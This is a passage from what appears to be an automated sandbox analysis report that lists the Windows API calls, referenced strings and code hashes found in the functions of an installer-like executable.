                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressByteCharMultiProcWide
                                                                                  • String ID: SfcIsFileProtected$sfc.dll
                                                                                  • API String ID: 2508298434-591603554
                                                                                  • Opcode ID: 3217ee99d138f0ad1313a93335353a3aec08b44a783225051531d7f68469a82d
                                                                                  • Instruction ID: fbb3ec6cd5b50b63fd35f8a1b68fa202e0926d3941eb24adcf984c27ed24a225
                                                                                  • Opcode Fuzzy Hash: 3217ee99d138f0ad1313a93335353a3aec08b44a783225051531d7f68469a82d
                                                                                  • Instruction Fuzzy Hash: E041A931A04218AFE710DB59DC85B9DB7B8AB4430DF5041BBA908A7293D7789F89CB1D
                                                                                  APIs
                                                                                  • 751C1520.VERSION(00000000,?,?,?,00497FD8), ref: 004525A4
                                                                                  • 751C1500.VERSION(00000000,?,00000000,?,00000000,0045261F,?,00000000,?,?,?,00497FD8), ref: 004525D1
                                                                                  • 751C1540.VERSION(?,00452648,?,?,00000000,?,00000000,?,00000000,0045261F,?,00000000,?,?,?,00497FD8), ref: 004525EB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: C1500C1520C1540
                                                                                  • String ID: Y&E
                                                                                  • API String ID: 1315064709-1497692694
                                                                                  • Opcode ID: fc37f08206c8e69686d66defdddf94d54b59a29bfc554a83f5df64d87965b3cc
                                                                                  • Instruction ID: fe46317749af1235fc1090c5145677311abee9a989b9ebf20271da6a38a4ce9d
                                                                                  • Opcode Fuzzy Hash: fc37f08206c8e69686d66defdddf94d54b59a29bfc554a83f5df64d87965b3cc
                                                                                  • Instruction Fuzzy Hash: 89218471A00608AFDB01DAA98D41DAFB7FCEB4A701F55407BFD00E3382D6B99E058769
                                                                                  APIs
                                                                                  • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                    • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                    • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                  • API String ID: 395431579-1506664499
                                                                                  • Opcode ID: c7efe619f5e20201de876e313b24fed92eb53944867450a94c2631c4c6fd4432
                                                                                  • Instruction ID: c6c149a21ca36cce9dc82633ca781001b445ce448e924a27762e383bc0e4c558
                                                                                  • Opcode Fuzzy Hash: c7efe619f5e20201de876e313b24fed92eb53944867450a94c2631c4c6fd4432
                                                                                  • Instruction Fuzzy Hash: 9611A331B40214BBD711EB62EC81B9E7BA8DB55704F90447BF400A6691DBB89E058A6C
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegCloseKey.ADVAPI32(?,00455B23,?,00000001,00000000), ref: 00455B16
                                                                                  Strings
                                                                                  • PendingFileRenameOperations2, xrefs: 00455AF7
                                                                                  • PendingFileRenameOperations, xrefs: 00455AE8
                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455AC4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                  • API String ID: 47109696-2115312317
                                                                                  • Opcode ID: a49214c642ba0f5729985fa818f0988ef7dc9ffa23a320832437af575ff29d5e
                                                                                  • Instruction ID: 8ecee5c25e066e5253f0bac752b33d84760847f1c596038c9bfe8eab8c09834c
                                                                                  • Opcode Fuzzy Hash: a49214c642ba0f5729985fa818f0988ef7dc9ffa23a320832437af575ff29d5e
                                                                                  • Instruction Fuzzy Hash: 62F06D71604A08ABE704D666EC2BA3F73ACD745711FA0446AF80096682EA7DBD04966C
                                                                                  APIs
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00472521,?,00000000,?,0049D1E0,00000000,00472711,?,00000000,?,00000000,?,004728DD), ref: 004724FD
                                                                                  • FindClose.KERNEL32(000000FF,00472528,00472521,?,00000000,?,0049D1E0,00000000,00472711,?,00000000,?,00000000,?,004728DD,?), ref: 0047251B
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00472643,?,00000000,?,0049D1E0,00000000,00472711,?,00000000,?,00000000,?,004728DD), ref: 0047261F
                                                                                  • FindClose.KERNEL32(000000FF,0047264A,00472643,?,00000000,?,0049D1E0,00000000,00472711,?,00000000,?,00000000,?,004728DD,?), ref: 0047263D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileNext
                                                                                  • String ID:
                                                                                  • API String ID: 2066263336-0
                                                                                  • Opcode ID: 2ebc6e526ef3f332d7d23b3c970b82b2693ae9964aad5ea01d0d0e8cb2a6954e
                                                                                  • Instruction ID: 7a1bd4c17f6bec3c86e88fdd6a66a52641a18dd0aa7136e5d167ac57a2fd4188
                                                                                  • Opcode Fuzzy Hash: 2ebc6e526ef3f332d7d23b3c970b82b2693ae9964aad5ea01d0d0e8cb2a6954e
                                                                                  • Instruction Fuzzy Hash: EFC13A7090424DAFCF11DFA5C981ADEBBB8BF48304F5085AAE848B3291D7789E46CF54
                                                                                  APIs
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,00480375,?,00000000,00000000,?,?,00481625,?,?,00000000), ref: 00480222
                                                                                  • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,00480375,?,00000000,00000000,?,?,00481625,?,?), ref: 0048022F
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00480348,?,?,?,?,00000000,00480375,?,00000000,00000000,?,?,00481625), ref: 00480324
                                                                                  • FindClose.KERNEL32(000000FF,0048034F,00480348,?,?,?,?,00000000,00480375,?,00000000,00000000,?,?,00481625,?), ref: 00480342
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileNext
                                                                                  • String ID:
                                                                                  • API String ID: 2066263336-0
                                                                                  • Opcode ID: c9213149dad22109f0a90e82e8ac420b2eeb9db7d2efcfc5c24199a260e086dc
                                                                                  • Instruction ID: 9f58e88908a8a949c71addf9751e3e387abd808faae0fc06516958b92eae9c2a
                                                                                  • Opcode Fuzzy Hash: c9213149dad22109f0a90e82e8ac420b2eeb9db7d2efcfc5c24199a260e086dc
                                                                                  • Instruction Fuzzy Hash: EF514071A00648AFCB61EFA5CC45ADEB7B8EB48315F1044AAA808E7351D6389F89CF54
                                                                                  APIs
                                                                                  • GetMenu.USER32(00000000), ref: 00421371
                                                                                  • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu
                                                                                  • String ID:
                                                                                  • API String ID: 3711407533-0
                                                                                  • Opcode ID: e1bfbeb149fb62e2ad3ad2db837168bd52a0f21d6f4abec7b0304e20cb9d907d
                                                                                  • Instruction ID: e7a4369f7fbd106bab2429e1e1dd333134a7e32046ee40fa4552f8195e128e42
                                                                                  • Opcode Fuzzy Hash: e1bfbeb149fb62e2ad3ad2db837168bd52a0f21d6f4abec7b0304e20cb9d907d
                                                                                  • Instruction Fuzzy Hash: 3F41BE3070026457EB20EA7AA88579B26965F69318F4815BFBC40DF3A3CA7DCC49839D
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$CallMessageProcSendTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 601730667-0
                                                                                  • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                  • Instruction ID: 87133af12c35957a9f748eb5c35761c869d5d8ea54ed11f3f8892641f8a911b8
                                                                                  • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                  • Instruction Fuzzy Hash: A71151B5600A04AFC710EE6ECC84E8773ECDF48314715843EB59ADB612D63CF8418B69
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0042312E
                                                                                  • EnumFontsA.GDI32(00000000,00000000,00423078,00410470,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423149
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00423154
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDeviceEnumFontsRelease
                                                                                  • String ID:
                                                                                  • API String ID: 2698912916-0
                                                                                  • Opcode ID: 94eb306c5e826a01f1e4729cfd5040e8a639f913efc3b2db58b8d9c882bc8d8f
                                                                                  • Instruction ID: 95c686a17d04cc75fabac772af01a2849e5ccccd572a20f260adec4fb0f0daed
                                                                                  • Opcode Fuzzy Hash: 94eb306c5e826a01f1e4729cfd5040e8a639f913efc3b2db58b8d9c882bc8d8f
                                                                                  • Instruction Fuzzy Hash: 7D01DE617043002AE310BF7A5C82BAB3BA49F05319F40027FF908AA3C2D67E9C0447AE
                                                                                  APIs
                                                                                  • RtlInitializeCriticalSection.KERNEL32(0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                  • RtlEnterCriticalSection.KERNEL32(0049C420,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049C420,00401A89,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                  • String ID:
                                                                                  • API String ID: 730355536-0
                                                                                  • Opcode ID: 258d9deb6f7a10e014db2841a00646f08a98b62604f56307b5f20277c9267f14
                                                                                  • Instruction ID: 68a963c4b4ce3cb9fa4489d147f84cdc209e61955976dc0c42ca8291dd14a8a4
                                                                                  • Opcode Fuzzy Hash: 258d9deb6f7a10e014db2841a00646f08a98b62604f56307b5f20277c9267f14
                                                                                  • Instruction Fuzzy Hash: 1501C0707842405EFB19AB6998A27353ED4D796748F91803BF440A6AF1C67C4840CB6D
                                                                                  APIs
                                                                                    • Part of subcall function 004509A0: SetEndOfFile.KERNEL32(?,?,0045C3EA,00000000,0045C575,?,00000000,00000002,00000002), ref: 004509A7
                                                                                  • FlushFileBuffers.KERNEL32(?), ref: 0045C541
                                                                                  Strings
                                                                                  • NumRecs range exceeded, xrefs: 0045C43E
                                                                                  • EndOffset range exceeded, xrefs: 0045C475
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$BuffersFlush
                                                                                  • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                  • API String ID: 3593489403-659731555
                                                                                  • Opcode ID: f4838951b250da02c76fa3d1935671775a2aba9884ef291465624927e2e75a92
                                                                                  • Instruction ID: 57127da9839884e48f93c65e4688b7b5a24f3d4ce709f11da5987aa0442ebed2
                                                                                  • Opcode Fuzzy Hash: f4838951b250da02c76fa3d1935671775a2aba9884ef291465624927e2e75a92
                                                                                  • Instruction Fuzzy Hash: E461A234A003588FDB25DF25C891AD9B7B5EF49305F0084DAED89AB352DA74AEC8CF54
                                                                                  APIs
                                                                                    • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049928E), ref: 0040334B
                                                                                    • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049928E), ref: 00403356
                                                                                    • Part of subcall function 0040632C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00499298), ref: 00406332
                                                                                    • Part of subcall function 0040632C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040633F
                                                                                    • Part of subcall function 0040632C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406355
                                                                                    • Part of subcall function 0040632C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040636B
                                                                                    • Part of subcall function 0040632C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00499298), ref: 00406376
                                                                                    • Part of subcall function 004063D4: 6F9C1CD0.COMCTL32(0049929D), ref: 004063D4
                                                                                    • Part of subcall function 00410774: GetCurrentThreadId.KERNEL32 ref: 004107C2
                                                                                    • Part of subcall function 00419050: GetVersion.KERNEL32(004992B6), ref: 00419050
                                                                                    • Part of subcall function 0044F7B8: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004992CA), ref: 0044F7F3
                                                                                    • Part of subcall function 0044F7B8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F7F9
                                                                                    • Part of subcall function 0044FC84: GetVersionExA.KERNEL32(0049C790,004992CF), ref: 0044FC93
                                                                                    • Part of subcall function 00453264: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004532FD,?,?,?,?,00000000,?,004992DE), ref: 00453284
                                                                                    • Part of subcall function 00453264: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045328A
                                                                                    • Part of subcall function 00453264: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004532FD,?,?,?,?,00000000,?,004992DE), ref: 0045329E
                                                                                    • Part of subcall function 00453264: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004532A4
                                                                                    • Part of subcall function 0045715C: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00457180
                                                                                    • Part of subcall function 0046469C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004992F2), ref: 004646AB
                                                                                    • Part of subcall function 0046469C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 004646B1
                                                                                    • Part of subcall function 0046CEF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CF05
                                                                                    • Part of subcall function 0047905C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004992FC), ref: 00479062
                                                                                    • Part of subcall function 0047905C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047906F
                                                                                    • Part of subcall function 0047905C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047907F
                                                                                    • Part of subcall function 0048446C: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0048455B
                                                                                    • Part of subcall function 0049628C: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 004962A5
                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00499344), ref: 00499316
                                                                                    • Part of subcall function 00499040: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00499320,00000001,00000000,00499344), ref: 0049904A
                                                                                    • Part of subcall function 00499040: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00499050
                                                                                    • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                  • ShowWindow.USER32(?,00000005,00000000,00499344), ref: 00499377
                                                                                    • Part of subcall function 00482AAC: SetActiveWindow.USER32(?), ref: 00482B5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                  • String ID: Setup
                                                                                  • API String ID: 504348408-3839654196
                                                                                  • Opcode ID: 233cc421e83f8cc3dcda037f4a9b597bd0151155db56c05575de1988a9d1a60d
                                                                                  • Instruction ID: 0ced0f24ac175d21b3299cf0cac8cd2bc44ae01cd64648103e70fccb26a7f3a2
                                                                                  • Opcode Fuzzy Hash: 233cc421e83f8cc3dcda037f4a9b597bd0151155db56c05575de1988a9d1a60d
                                                                                  • Instruction Fuzzy Hash: A231C6312086408FD6117BBBEC5365D3BA8EB8D718BA2447FF80496693DE3D5C118A7E
                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B87,?,?,00000000,0049C628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453ADE
                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B87,?,?,00000000,0049C628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453AE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID: .tmp
                                                                                  • API String ID: 1375471231-2986845003
                                                                                  • Opcode ID: 2e6224e559e09b21c1e7174e7b36b30504437a5f64767d5dc9f4cda500c72cf1
                                                                                  • Instruction ID: ff9a18ef253650dbf03605879231b3438c9749bdb0146341c5730265e1144e14
                                                                                  • Opcode Fuzzy Hash: 2e6224e559e09b21c1e7174e7b36b30504437a5f64767d5dc9f4cda500c72cf1
                                                                                  • Instruction Fuzzy Hash: A4213674A00208ABDB01EFA5C8529EEB7B8EB44315F50457BF801B7342DA389F058B69
                                                                                  APIs
                                                                                    • Part of subcall function 00483F60: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483F71
                                                                                    • Part of subcall function 00483F60: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483F7E
                                                                                    • Part of subcall function 00483F60: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483F8C
                                                                                    • Part of subcall function 00483F60: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483F94
                                                                                    • Part of subcall function 00483F60: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483FA0
                                                                                    • Part of subcall function 00483F60: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483FC1
                                                                                    • Part of subcall function 00483F60: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483FD4
